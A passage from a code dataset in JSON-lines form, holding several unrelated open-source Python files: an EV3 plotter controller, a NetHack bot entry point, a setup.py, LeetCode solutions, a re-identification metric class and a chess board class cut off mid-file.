'lasers.csv')\n pd_settings = reader.read_old_settings(path)\n save_csv(pd_settings, output_path + 'settings.csv')\n except(Exception):\n print('Could Not process data')\n pass\n pd_bva = reader.read_positions(path)\n save_csv(pd_bva, output_path + 'positions_unprocessed.csv')\n pd_bva_prep = prepare_position(pd_bva)\n save_csv(pd_bva_prep, output_path + 'positions_processed.csv')\n pd_sync = reader.read_sync_times(path)\n save_csv(pd_sync, output_path + 'sync_times.csv')\n","repo_name":"hejtmy/bvareader","sub_path":"bvareader/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"43471067708","text":"import math\r\nimport time\r\nfrom time import sleep\r\n\r\nfrom ev3dev.ev3 import *\r\nfrom ev3dev.auto import OUTPUT_A, OUTPUT_B, OUTPUT_C, OUTPUT_D\r\n\r\nfrom draw_action import DrawAction\r\n\r\nprint(\"Loading libraries completed. 
Time to relax!\")\n\nclass Plott3r:\n def __init__(self):\n\n self.touch_sensor = TouchSensor()\n assert self.touch_sensor.connected\n\n self.rail_motor = LargeMotor(OUTPUT_A)\n assert self.rail_motor.connected\n\n self.paper_motor = LargeMotor(OUTPUT_B)\n assert self.paper_motor.connected\n\n self.pen_motor = MediumMotor(OUTPUT_C)\n assert self.pen_motor.connected\n\n # List of draw commands\n self.draw_list = []\n\n self.motors_calibrated = False\n self.x_units_to_cm = 1# / 1.1\n self.y_units_to_cm = 1# / 1.2\n\n self.is_drawing = False\n self.is_busy = False\n self.is_pen_up = False\n self.current_draw_Item = None\n self.prev_draw_Item = None\n self.pen_is_adjustable = True\n\n self.rail_motor_max_speed = 100\n self.paper_motor_max_speed = 100\n self.pen_motor_max_speed = 100\n\n self.all_motor_speed_mutiplier = 10\n\n def reset_motors(self):\n self.reset_rail_motor()\n self.reset_paper_motor()\n self.reset_pen_motor()\n\n def reset_rail_motor(self):\n self.rail_motor.reset()\n self.rail_motor.stop_action = Motor.STOP_ACTION_HOLD\n self.rail_motor.speed_sp = 600\n self.rail_motor.polarity = Motor.POLARITY_INVERSED\n self.rail_motor_max_speed = self.rail_motor.max_speed\n self.rail_motor.position_p = 80000\n self.rail_motor.position_i = 400\n self.rail_motor.position_d = 0\n self.rail_motor.speed_p = 1000\n self.rail_motor.speed_i = 60\n self.rail_motor.speed_d = 0\n\n def reset_paper_motor(self):\n self.paper_motor.reset()\n self.paper_motor.stop_action = Motor.STOP_ACTION_HOLD\n self.paper_motor.speed_sp = 600\n self.paper_motor.polarity = Motor.POLARITY_INVERSED\n self.paper_motor_max_speed = self.paper_motor.max_speed\n self.paper_motor.position_p = 80000\n self.paper_motor.position_i = 400\n self.paper_motor.position_d = 0\n self.paper_motor.speed_p = 1000\n self.paper_motor.speed_i = 60\n self.paper_motor.speed_d = 0\n\n def reset_pen_motor(self):\n self.pen_motor.reset()\n self.pen_motor.stop_action = Motor.STOP_ACTION_HOLD\n self.pen_motor.speed_sp = 600\n self.pen_motor_max_speed = self.pen_motor.max_speed\n\n def force_stop(self):\n self.draw_list = []\n self.current_draw_Item = None\n self.prev_draw_Item = None\n self.pen_up()\n self.rail_motor.stop()\n self.paper_motor.stop()\n self.is_drawing = False\n self.is_busy = False\n\n def switch_pen_state(self):\n if self.pen_is_adjustable is False:\n self.pen_is_adjustable = True\n self.pen_motor.stop_action = Motor.STOP_ACTION_BRAKE\n else:\n self.pen_is_adjustable = True\n self.pen_motor.stop_action = Motor.STOP_ACTION_HOLD\n\n def pen_up(self):\n if self.is_pen_up is False:\n self.is_pen_up = True\n self.pen_motor.run_to_abs_pos(position_sp=100, speed_sp=600)\n\n def pen_down(self):\n if self.is_pen_up is True:\n self.is_pen_up = False\n self.pen_motor.run_to_abs_pos(position_sp=0, speed_sp=600)\n\n def draw(self, draw_list):\n if self.is_busy:\n return\n self.is_busy = True\n\n Sound.speak('Drawing Started').wait()\n\n self.draw_list = draw_list\n self.draw_list.reverse()\n self.current_draw_Item = self.draw_list.pop()\n\n self.start_draw()\n self.pen_up()\n\n self.is_busy = False\n Sound.speak('Drawing Finished').wait()\n\n def draw_next_item(self):\n if len(self.draw_list) > 0:\n\n if (self.current_draw_Item.t == DrawAction.PEN_MOVE):\n self.prev_draw_Item = DrawAction(self.current_draw_Item.t, self.current_draw_Item.x,\n self.current_draw_Item.y)\n self.current_draw_Item = self.draw_list.pop()\n else:\n self.prev_draw_Item = None\n self.current_draw_Item = None\n\n def start_draw(self):\n print (\"Start Drawing\")\n while 
self.current_draw_Item is not None:\n if self.current_draw_Item.t == DrawAction.PEN_UP:\n self.pen_up()\n while self.pen_motor.position < 99:\n time.sleep(0.1)\n\n elif self.current_draw_Item.t == DrawAction.PEN_DOWN:\n self.pen_down()\n while self.pen_motor.position > 2:\n sleep(0.1)\n\n elif self.current_draw_Item.t == DrawAction.PEN_MOVE:\n\n to_x = math.floor(self.current_draw_Item.x * self.x_units_to_cm)\n to_y = math.floor(self.current_draw_Item.y * self.y_units_to_cm)\n\n ratio = 1\n dcsp = 30\n x_dcsp = dcsp\n y_dcsp = dcsp\n\n if self.prev_draw_Item is not None:\n dx = abs(self.current_draw_Item.x - self.prev_draw_Item.x)\n dy = abs(self.current_draw_Item.y - self.prev_draw_Item.y)\n else:\n dx = abs(to_x - self.rail_motor.position)\n dy = abs(to_y - self.paper_motor.position)\n\n if dx > 0 and dy > 0: # both axes must move before forming the ratio dy / dx\n ratio = dy / dx\n\n if ratio > 1: # y is longer\n x_dcsp = dcsp / ratio\n if (x_dcsp < 10):\n x_dcsp = 10\n y_dcsp = 10 * ratio\n\n elif 1 > ratio > 0: # x is longer\n y_dcsp = dcsp / ratio\n if (y_dcsp < 10):\n y_dcsp = 10\n x_dcsp = 10 * ratio\n\n x_dcsp = math.ceil(max(0, (min(100, x_dcsp))))\n y_dcsp = math.ceil(max(0, (min(100, y_dcsp))))\n\n print (\"CX:\"+ str(self.current_draw_Item.x)+ \"CY:\"+ str(self.current_draw_Item.y))\n if self.prev_draw_Item is not None:\n print (\"PX:\"+ str(self.prev_draw_Item.x)+\"PY:\"+ str(self.prev_draw_Item.y))\n\n x_completed = True\n y_completed = True\n\n if dx > 0:\n x_completed = False\n self.rail_motor.run_to_abs_pos(position_sp=to_x, speed_sp=x_dcsp*self.all_motor_speed_mutiplier)\n\n if dy > 0:\n y_completed = False\n self.paper_motor.run_to_abs_pos(position_sp=to_y, speed_sp=y_dcsp*self.all_motor_speed_mutiplier)\n\n start_time = time.time()\n while self.current_draw_Item is not None and (x_completed is False or y_completed is False):\n\n if x_completed is False:\n dx = abs(to_x - self.rail_motor.position)\n if dx <= 1:\n x_completed = True\n self.rail_motor.stop()\n\n if y_completed is False:\n dy = abs(to_y - self.paper_motor.position)\n if dy <= 1:\n y_completed = True\n self.paper_motor.stop()\n\n if time.time() - start_time > 15:\n break\n\n sleep(0.1)\n\n self.draw_next_item()\n\n def manual_paper_feed_inc(self, direction):\n self.paper_motor.run_forever(speed_sp=400 * direction)\n\n def manual_paper_feed_inc_stop(self):\n self.paper_motor.stop()\n\n def manual_paper_feed(self, direction):\n self.paper_motor.run_forever(speed_sp=400 * direction)\n\n def stop_paper_feed(self):\n self.reset_paper_motor()\n\n def manual_move_x(self, direction):\n self.rail_motor.run_forever(speed_sp=600 * direction)\n\n def manual_stop_x(self):\n self.rail_motor.stop()\n\n def switch_pen_pos(self):\n if self.is_pen_up is True:\n self.pen_down()\n else:\n self.pen_up()\n\n def calibrate(self):\n if self.is_busy:\n return\n self.is_busy = True\n\n Sound.speak('Calibrating Motor Positions').wait()\n\n self.rail_motor.polarity = Motor.POLARITY_INVERSED\n self.rail_motor.run_forever(speed_sp=-500)\n\n wait_for_button_press = True\n while wait_for_button_press:\n if self.touch_sensor.value():\n wait_for_button_press = False\n self.rail_motor.stop()\n self.reset_rail_motor()\n self.rail_motor.run_to_abs_pos(position_sp=100, speed_sp=600)\n\n self.motors_calibrated = True\n self.is_busy = False\n\n Sound.speak('Calibrating Motor Positions Completed').wait()\n\n return \"Calibration Completed\"\n\n def set_pen_position(self):\n self.pen_motor.reset()\n self.pen_motor.stop_action = Motor.STOP_ACTION_BRAKE\n self.pen_motor.speed_sp = 600\n\n def 
feed_paper(self):\n\n if self.is_busy:\n return\n self.is_busy = True\n\n timer = 0\n max_time = 1000\n\n self.paper_motor.run_forever(speed_sp=-400)\n\n waiting_paper = True\n while waiting_paper:\n timer += 1\n if timer > max_time:\n waiting_paper = False\n Sound.speak('Loaded').wait()\n self.is_busy = False\n return\n\n self.paper_motor.run_to_rel_pos(position_sp=-40, speed_sp=500)\n sleep(0.5)\n\n self.reset_paper_motor()\n\n self.is_busy = False\n Sound.speak('Paper Feeded').wait()\n","repo_name":"RedNicStone/plott3r","sub_path":"Programms/Plotter/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":9852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"73369474647","text":"import sys\r\nimport json\r\nimport time\r\nimport argparse\r\nimport gym\r\nfrom modules import general_modules, reach_modules, secret_passage_modules\r\nfrom core import Saver, GameWhisperer, DungeonWalker, main_logic\r\nfrom nle import nethack\r\n\r\ndef start_bot(env, saver, filename):\r\n with open('config.json', 'r') as f:\r\n config = json.load(f)\r\n\r\n print(\"\\nLuckyMera-v1.0 is looking for the Amulet of Yendor on the map ...\\n\")\r\n\r\n exec_mode = config['fast_mode']\r\n mode = False\r\n if exec_mode == \"on\":\r\n mode = True\r\n print(\"\\nFast_Mode : ON\")\r\n elif exec_mode == \"off\":\r\n print(\"\\nFast_Mode : OFF\")\r\n else:\r\n print(\"\\nFast_Mode can only be \\\"on\\\" or \\\"off\\\" -> value set to default : OFF\")\r\n time.sleep(0.5)\r\n\r\n games_number = 100\r\n try:\r\n games_number = int(config['attempts'])\r\n print(\"Attempts : \", games_number)\r\n except:\r\n print(\"Attempts must be an int value -> value set to default : \", games_number)\r\n games_number = 100\r\n time.sleep(0.5)\r\n\r\n game_interface = GameWhisperer(env, mode, saver, filename)\r\n walk_logic = DungeonWalker(game_interface)\r\n\r\n skill_prio = config['skill_prio_list']\r\n skill_modules_map = {}\r\n for i in range(0, len(skill_prio)):\r\n skill_name = skill_prio[i]\r\n \r\n if hasattr(general_modules, skill_name): skill_class = getattr(general_modules, skill_name)\r\n elif hasattr(reach_modules, skill_name): skill_class = getattr(reach_modules, skill_name)\r\n elif hasattr(secret_passage_modules, skill_name): skill_class = getattr(secret_passage_modules, skill_name)\r\n else: sys.exit('skill not found')\r\n\r\n skill_modules_map[skill_name] = skill_class(walk_logic, game_interface, skill_name)\r\n print(skill_name)\r\n time.sleep(0.1)\r\n\r\n print(\"\\nLuckyMera-v.10 is ready for YASD ...\")\r\n print(\"\\n\\n\")\r\n time.sleep(1)\r\n\r\n return walk_logic, game_interface, skill_prio, skill_modules_map, games_number\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n\r\n parser.add_argument(\r\n '--env_name',\r\n type=str,\r\n default='NetHackChallenge-v0',\r\n help='The environment to use'\r\n )\r\n parser.add_argument(\r\n '--inference',\r\n dest='training',\r\n action='store_false',\r\n help='Use the framework to actually play the game'\r\n )\r\n parser.add_argument(\r\n '--observation_keys',\r\n dest='observation_keys',\r\n nargs='+',\r\n default=None,\r\n help='Specify the observation space of nle'\r\n )\r\n \r\n #### DATASET CREATION PARAMETERS ####\r\n dataset_creation_group = parser.add_argument_group('dataset creation')\r\n dataset_creation_group.add_argument(\r\n '--create_dataset',\r\n dest='create_dataset',\r\n action='store_true',\r\n help='Use the bot to generate a dataset of trajectories'\r\n )\r\n 
dataset_creation_group.add_argument(\r\n '--language_mode',\r\n dest='language_mode',\r\n action='store_true',\r\n help='Save trajectories in language mode, using the nle_language_wrapper'\r\n )\r\n dataset_creation_group.add_argument(\r\n '--keys_to_save',\r\n dest='keys_to_save',\r\n nargs='+',\r\n default=None,\r\n help='Specify the observation keys to save'\r\n )\r\n dataset_creation_group.add_argument(\r\n '--filename',\r\n type=str,\r\n default='saved_trajectories',\r\n help='The path where to save trajectories' \r\n )\r\n\r\n #### TRAINING PARAMETERS ####\r\n training_group = parser.add_argument_group('training mode')\r\n training_group.add_argument(\r\n '--training',\r\n dest='training',\r\n action='store_true',\r\n help='Train a neural model'\r\n )\r\n training_group.add_argument(\r\n '--training_alg',\r\n type=str,\r\n default=None,\r\n help='Select the training algorithm to use'\r\n )\r\n training_group.add_argument(\r\n '--dataset',\r\n type=str,\r\n default='saved_trajectories.pkl',\r\n help='Path to the dataset for the training process'\r\n )\r\n training_group.add_argument(\r\n '--batch_size',\r\n type=int,\r\n default=32,\r\n help='Size of the batch in the training process'\r\n )\r\n training_group.add_argument(\r\n '--checkpoint',\r\n type=str,\r\n default='saved_model',\r\n help='Path to save the trained model'\r\n )\r\n training_group.add_argument(\r\n '--cuda',\r\n dest='cuda',\r\n action='store_true',\r\n help='Use cuda for training'\r\n )\r\n training_group.add_argument(\r\n '--no_cuda',\r\n dest='cuda',\r\n action='store_false',\r\n help='Do not use cuda for training'\r\n )\r\n parser.set_defaults(cuda=True)\r\n training_group.add_argument(\r\n '--seed',\r\n type=int,\r\n default=42,\r\n help='Random seed'\r\n )\r\n training_group.add_argument(\r\n '--learning_rate',\r\n type=float,\r\n default=1e-5,\r\n help='Learning rate of the training process'\r\n )\r\n training_group.add_argument(\r\n '--scheduler_gamma',\r\n type=float,\r\n default=0.7,\r\n help='The gamma parameter of the scheduler of the training process'\r\n )\r\n training_group.add_argument(\r\n '--epochs',\r\n type=int,\r\n default=5,\r\n help='Number of epochs'\r\n )\r\n parser.set_defaults(training=False)\r\n\r\n flags = parser.parse_args()\r\n env_name = flags.env_name\r\n create_dataset = flags.create_dataset\r\n language_mode = flags.language_mode\r\n keys_to_save = flags.keys_to_save\r\n filename = flags.filename\r\n training_mode = flags.training\r\n training_alg_name = flags.training_alg\r\n dataset = flags.dataset\r\n batch_size = flags.batch_size\r\n checkpoint = flags.checkpoint\r\n observation_keys = flags.observation_keys\r\n\r\n training_params = {}\r\n training_params['use_cuda'] = flags.cuda\r\n print(f'\\n\\n\\n\\nLuckyMera using cuda: {flags.cuda}')\r\n training_params['seed'] = flags.seed\r\n training_params['learning_rate'] = flags.learning_rate\r\n training_params['scheduler_gamma'] = flags.scheduler_gamma\r\n training_params['epochs'] = flags.epochs\r\n\r\n print(f'training mode: {training_mode}')\r\n print(f'obs_keys: {observation_keys}')\r\n\r\n if 'MiniHack' in env_name: import minihack\r\n\r\n # use the complete action space also for minihack envs\r\n if observation_keys:\r\n env = gym.make(env_name, observation_keys=observation_keys, actions=nethack.ACTIONS)\r\n #if no observation_keys are specified, all the keys are included\r\n else: env = gym.make(env_name, actions=nethack.ACTIONS)\r\n \r\n if training_mode:\r\n import training\r\n if not training_alg_name:\r\n raise 
SystemError('No training algorithm specified')\r\n if hasattr(training, training_alg_name):\r\n training_alg_class = getattr(training, training_alg_name)\r\n print(f'Using {training_alg_name} for training')\r\n else:\r\n raise SystemError(f'The training algorithm {training_alg_name} is not implemented in training.py')\r\n\r\n training_alg = training_alg_class(training_params, env, dataset, batch_size, checkpoint)\r\n training_alg.train()\r\n else:\r\n if create_dataset and not filename:\r\n raise SystemError('no filename to store trajectories')\r\n if language_mode and not create_dataset:\r\n raise SystemError('language mode selected, but create_dataset is false')\r\n if create_dataset and not keys_to_save:\r\n raise SystemError('keys_to_save equal to None - No keys to save')\r\n \r\n\r\n if language_mode:\r\n from nle_language_wrapper import NLELanguageWrapper\r\n env = NLELanguageWrapper(env, use_language_action=False)\r\n if create_dataset: saver = Saver(keys_to_save, filename)\r\n else: saver = None\r\n\r\n dungeon_walker, game, logic, skill_map, attempts = start_bot(env, saver, filename)\r\n main_logic(dungeon_walker, game, logic, skill_map, attempts)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Pervasive-AI-Lab/LuckyMera","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8145,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"31"} +{"seq_id":"43216289742","text":"from setuptools import setup\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetup(\n name='pioneer_sdk',\n packages=['pioneer_sdk', 'pioneer_sdk.mavsub', 'pioneer_sdk.tools'],\n include_package_data=True,\n version='0.5.3',\n license='MIT',\n description='Programming tools for programming geoscan pioneer drone',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author='geoscan',\n author_email='info@geoscan.aero',\n url='https://github.com/geoscan/pioneer_sdk',\n keywords=['mavlink', 'pioneer', 'geoscan'],\n setup_requires=['wheel'],\n install_requires=[\n 'pymavlink==2.4.37',\n 'pyserial==3.5',\n 'future==0.18.3',\n 'numpy',\n 'opencv-contrib-python==4.7.0.72'\n ],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.7',\n)\n","repo_name":"geoscan/pioneer_sdk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"14477236268","text":"#Memoization\nclass Solution:\n def longestPalindromeSubseq(self, s: str) -> int:\n \n def dp(l1,l2):\n if l1>l2:\n return 0\n if l1 == l2:\n return 1\n if dp1[l1][l2] != -1:\n return dp1[l1][l2]\n \n if s[l1] == s[l2]:\n dp1[l1][l2] = dp(l1+1,l2-1) + 2\n else:\n dp1[l1][l2] = max(dp(l1+1,l2),dp(l1,l2-1))\n \n return dp1[l1][l2]\n \n l = len(s)\n dp1 = [[-1 for i in range(l+1)]for j in range(l+1)]\n return dp(0,l-1)\n\n#Tabular\nclass Solution:\n def longestPalindromeSubseq(self, s: str) -> int:\n \n l = len(s)\n s2 = s[::-1]\n dp = [[0 for i in range(l+1)]for j in range(l+1)]\n \n \n for i in range(1,l+1):\n for j in range(1,l+1):\n if s[i-1] == s2[j-1]:\n dp[i][j] = dp[i-1][j-1] + 1\n else:\n dp[i][j] = max(dp[i-1][j],dp[i][j-1])\n \n return dp[l][l]\n 
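\n# Hypothetical sanity check (a comment added here, not part of the original file):\n# both versions above should give longestPalindromeSubseq(\"bbbab\") == 4, matching the subsequence \"bbbb\".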
\n","repo_name":"bhardwaj-ishita/Interview-Prep","sub_path":"DSA/Dynamic-Programming/LongestPalindromicSubseq.py","file_name":"LongestPalindromicSubseq.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"73699435927","text":"class Solution:\n def sortColors(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n\n cnts = [0, 0, 0] # red, white, bule\n\n for num in nums:\n if num == 0:\n cnts[0] += 1\n elif num == 1:\n cnts[1] += 1\n else:\n cnts[2] += 1\n\n # write 0\n offset = 0\n for i in range(cnts[0]):\n nums[i] = 0\n\n # write 1\n offset = cnts[0]\n for i in range(cnts[1]):\n nums[i + offset] = 1\n\n # write 2\n offset += cnts[1]\n for i in range(cnts[2]):\n nums[i + offset] = 2\n\n return\n\n\"\"\"\nResults:\nRuntime: 16 ms, faster than 99.99% of Python3 online submissions for Sort Colors.\nMemory Usage: 14.3 MB, less than 5.09% of Python3 online submissions for Sort Colors.\n\"\"\"","repo_name":"buptwxd2/leetcode","sub_path":"Round_1/75. Sort Colors/solution_1.py","file_name":"solution_1.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71704758487","text":"from dataclasses import dataclass\nfrom logging import warning\n\nimport numpy as np\nimport torch\nfrom torchmetrics import Metric\nfrom tqdm import tqdm\n\nfrom person_reid.metrics.utils import (get_device_dtype, empty_metric_value,\n plot_cmc_line_plot)\n\n__all__ = ['ConfusionMetrics']\n\n\n@dataclass\nclass MetricAccumulator:\n tp: int = 0\n fp: int = 0\n tp_overall: int = 0\n fp_overall: int = 0\n\n def accumulate(self):\n self.tp_overall += self.tp\n self.fp_overall += self.fp\n self.tp = 0\n self.fp = 0\n\n @property\n def accuracy(self):\n assert self.tp == 0 and self.fp == 0\n if self.tp_overall + self.fp_overall == 0:\n warning('Not enough data to calculate accuracy')\n return 0.0\n return self.tp_overall / (self.tp_overall + self.fp_overall)\n\n\nclass ConfusionMetrics(Metric):\n def __init__(self, ranks=(1, 5, 10), max_cmc_rank=100):\n super().__init__(compute_on_step=False)\n self._ranks = ranks\n self._max_cmc_rank = max_cmc_rank\n self.add_state(f'gallery_embeddings', [], dist_reduce_fx=\"cat\")\n self.add_state(f'gallery_labels', [], dist_reduce_fx=\"cat\")\n self.add_state(f'query_embeddings', [], dist_reduce_fx=\"cat\")\n self.add_state(f'query_labels', [], dist_reduce_fx=\"cat\")\n self.eps = 1e-6\n\n def update(self, embeddings, gt_labels, is_query):\n self.query_embeddings.append(embeddings[is_query].half())\n self.query_labels.append(gt_labels[is_query])\n self.gallery_embeddings.append(embeddings[~is_query].half())\n self.gallery_labels.append(gt_labels[~is_query])\n\n def _calc_metrics_by_rank(self, class_idx, distances, metrics):\n def _calc_map():\n cmc = np.array([acc.tp for rank, acc in sorted(metrics.items(), key=lambda x: x[0])],\n dtype=np.float32)\n if cmc.sum() == 0:\n return 0.0\n\n cum_cmc = np.asarray([x / (i + 1.) 
for i, x in enumerate(cmc.cumsum())])\n return cum_cmc.sum() / cmc.sum()\n\n top_indexes = torch.argsort(distances)[:self._max_cmc_rank]\n top_classes = self.gallery_labels[top_indexes]\n for rank in range(self._max_cmc_rank):\n top_classes_ranked = top_classes[:rank]\n if (top_classes_ranked == class_idx).any():\n metrics[rank].tp += 1\n else:\n metrics[rank].fp += 1\n\n ap = _calc_map()\n\n for rank in range(self._max_cmc_rank):\n metrics[rank].accumulate()\n\n return ap\n\n def compute(self):\n device, dtype = get_device_dtype(self.gallery_embeddings)\n categories = set(list(self.query_labels))\n if len(categories) == 0:\n warning(f'ConfusionMetrics has received 0 categories in query data, check your test data')\n return empty_metric_value(dtype, device)\n\n min_metrics_by_rank = {rank: MetricAccumulator() for rank in range(self._max_cmc_rank)}\n max_metrics_by_rank = {rank: MetricAccumulator() for rank in range(self._max_cmc_rank)}\n mean_metrics_by_rank = {rank: MetricAccumulator() for rank in range(self._max_cmc_rank)}\n min_aps, max_aps, mean_aps = [], [], []\n for class_idx in tqdm(categories, desc='Calculating confusion metrics', leave=False):\n query_embeddings = self.query_embeddings[self.query_labels == class_idx]\n dists = torch.cdist(query_embeddings, self.gallery_embeddings,\n compute_mode='use_mm_for_euclid_dist')\n min_ap = self._calc_metrics_by_rank(class_idx, dists.min(dim=0)[0], min_metrics_by_rank)\n max_ap = self._calc_metrics_by_rank(class_idx, dists.max(dim=0)[0], max_metrics_by_rank)\n mean_ap = self._calc_metrics_by_rank(class_idx, dists.mean(dim=0), mean_metrics_by_rank)\n min_aps.append(min_ap)\n max_aps.append(max_ap)\n mean_aps.append(mean_ap)\n\n output = {}\n for rank in self._ranks:\n output[f'accuracy_{rank}_min'] = torch.tensor(min_metrics_by_rank[rank].accuracy,\n dtype=dtype, device=device)\n output[f'accuracy_{rank}_max'] = torch.tensor(max_metrics_by_rank[rank].accuracy,\n dtype=dtype, device=device)\n output[f'accuracy_{rank}_mean'] = torch.tensor(mean_metrics_by_rank[rank].accuracy,\n dtype=dtype, device=device)\n output[f'mAP_min'] = torch.tensor(np.mean(min_aps), dtype=dtype, device=device)\n output[f'mAP_max'] = torch.tensor(np.mean(max_aps), dtype=dtype, device=device)\n output[f'mAP_mean'] = torch.tensor(np.mean(mean_aps), dtype=dtype, device=device)\n output[f'cmc_min'] = plot_cmc_line_plot(min_metrics_by_rank)\n output[f'cmc_max'] = plot_cmc_line_plot(max_metrics_by_rank)\n output[f'cmc_mean'] = plot_cmc_line_plot(mean_metrics_by_rank)\n\n return output\n\n def reset(self):\n self.query_embeddings.clear()\n self.query_labels.clear()\n self.gallery_embeddings.clear()\n self.gallery_labels.clear()\n","repo_name":"JegernOUTT/reid_template","sub_path":"person_reid/metrics/confusion_metrics.py","file_name":"confusion_metrics.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5759293448","text":"from const import *\nfrom tile import Tile\nfrom piece import *\nfrom move import Move\nimport copy\nimport random\n\nclass Board:\n\n def __init__(self):\n self.tiles = [[0,0,0,0,0,0,0,0] for col in range(COLS)] #Initializing Tiles\n self.last_move = None\n self._create()\n self._add_pieces('black')\n self._add_pieces('white')\n self.move_log = []\n\n def _create(self):\n \"\"\"\n Create the board\n \"\"\"\n #Creating all tiles\n for row in range(ROWS):\n for col in range(COLS):\n self.tiles[row][col] = Tile(row, col)\n\n def _add_pieces(self, color):\n 
\"\"\"\n Add pieces for the initial board setup\n \"\"\"\n row_pawn, row_figure = (1, 0) if color == 'black' else (6, 7)\n\n #Adding pawns\n for col in range(COLS):\n self.tiles[row_pawn][col] = Tile(row_pawn, col, Pawn(color))\n \n #Adding knights\n self.tiles[row_figure][1] = Tile(row_figure, 1, Knight(color))\n self.tiles[row_figure][6] = Tile(row_figure, 6, Knight(color))\n\n #Adding bishops\n self.tiles[row_figure][2] = Tile(row_figure, 2, Bishop(color))\n self.tiles[row_figure][5] = Tile(row_figure, 5, Bishop(color))\n\n #Adding rooks\n self.tiles[row_figure][0] = Tile(row_figure, 0, Rook(color))\n self.tiles[row_figure][7] = Tile(row_figure, 7, Rook(color))\n\n #Adding the queen\n self.tiles[row_figure][3] = Tile(row_figure, 3, Queen(color))\n\n #Adding the king\n self.tiles[row_figure][4] = Tile(row_figure, 4, King(color))\n \n def possible_moves(self, piece, row, col, checked=False):\n \"\"\"\n Determine all valid moves of the piece\n \"\"\"\n def pawn_moves():\n \"\"\"\n All possible moves for the pawn pieces\n \"\"\"\n if piece.moved:\n steps = 1\n else:\n steps = 2\n \n ##Vertical moves\n start = row + piece.direction #Current position with pawn direction\n end = row + (piece.direction * (1 + steps)) #Maximum position (2 forward if it hasn't move yet else 1)\n for move_row in range(start, end, piece.direction):\n if Tile.in_range(move_row): #Check if the move is inside the board\n if self.tiles[move_row][col].is_empty(): #Check if the tile is empty\n initial_tile = Tile(row, col)\n final_tile = Tile(move_row, col)\n move = Move(initial_tile, final_tile, piece) #Create the new possible move\n \n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add it to the list\n else:\n piece.add_move(move) #Add it to the list \n else:\n #Pawn is blocked\n break #prevent the pawn to move 2 tiles forward even if an other piece is in front of it\n else:\n break\n \n ##Diagonal moves\n move_row = row + piece.direction\n move_cols = [\n col - 1,\n col + 1\n ]\n \n for move_col in move_cols:\n if Tile.in_range(move_row, move_col): #Check if the move is inside the board\n if self.tiles[move_row][move_col].has_hostile_piece(piece.color): #Check if the tile contains an enemy\n initial_tile = Tile(row, col)\n final_piece = self.tiles[move_row][move_col].piece\n final_tile = Tile(move_row, move_col, final_piece)\n move = Move(initial_tile, final_tile, piece, self.tiles[move_row][move_col].piece) #Create the new possible move\n \n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add it to the list\n else:\n piece.add_move(move) #Add it to the list \n \n ##En passant moves\n if piece.color == 'white':\n initial_pawn_row = 3\n final_pawn_row = 2\n else:\n initial_pawn_row = 4\n final_pawn_row = 5\n \n #Left en passant\n if Tile.in_range(col - 1) and row == initial_pawn_row: #Check if the left tile of the pawn is inside the board and if the pawn is in the fourth row\n if self.tiles[row][col - 1].has_hostile_piece(piece.color): #Check if the pawn has an oponent piece at his left\n enemy = self.tiles[row][col - 1].piece #Get the enemy piece\n if isinstance(enemy, Pawn): #Check if the enemy is a pawn\n if enemy.en_passant: #Check if the enemy just moved 2 tiles\n initial_tile = Tile(row, col) #Get initial tile\n final_tile = Tile(final_pawn_row, col - 1, enemy) 
#Get final tile\n move = Move(initial_tile, final_tile, piece, enemy) #Create the new move\n \n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add the pawn move to its list\n else:\n piece.add_move(move) #Add the pawn move to its list\n \n #Right en passant\n if Tile.in_range(col + 1) and row == initial_pawn_row: #Check if the left tile of the pawn is inside the board and if the pawn is in the fourth row\n if self.tiles[row][col + 1].has_hostile_piece(piece.color): #Check if the pawn has an oponent piece at his left\n enemy = self.tiles[row][col + 1].piece #Get the enemy piece\n if isinstance(enemy, Pawn): #Check if the enemy is a pawn\n if enemy.en_passant: #Check if the enemy just moved 2 tiles\n initial_tile = Tile(row, col) #Get initial tile\n final_tile = Tile(final_pawn_row, col + 1, enemy) #Get final tile\n move = Move(initial_tile, final_tile, piece, enemy) #Create the new move\n \n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add the pawn move to its list\n else:\n piece.add_move(move) #Add the pawn move to its list\n \n def knight_moves():\n \"\"\"\n All possible moves for the knight pieces\n \"\"\"\n moves = [\n (row + 1, col + 2),\n (row + 2, col + 1),\n (row + 2, col - 1),\n (row + 1, col - 2),\n (row - 1, col - 2),\n (row - 2, col - 1),\n (row - 2, col + 1),\n (row - 1, col + 2),\n ]\n \n #for each potential move, check if it's inside the board and if a move is possible (empty tile or with an enemy within it)\n for move in moves:\n move_row, move_col = move\n if 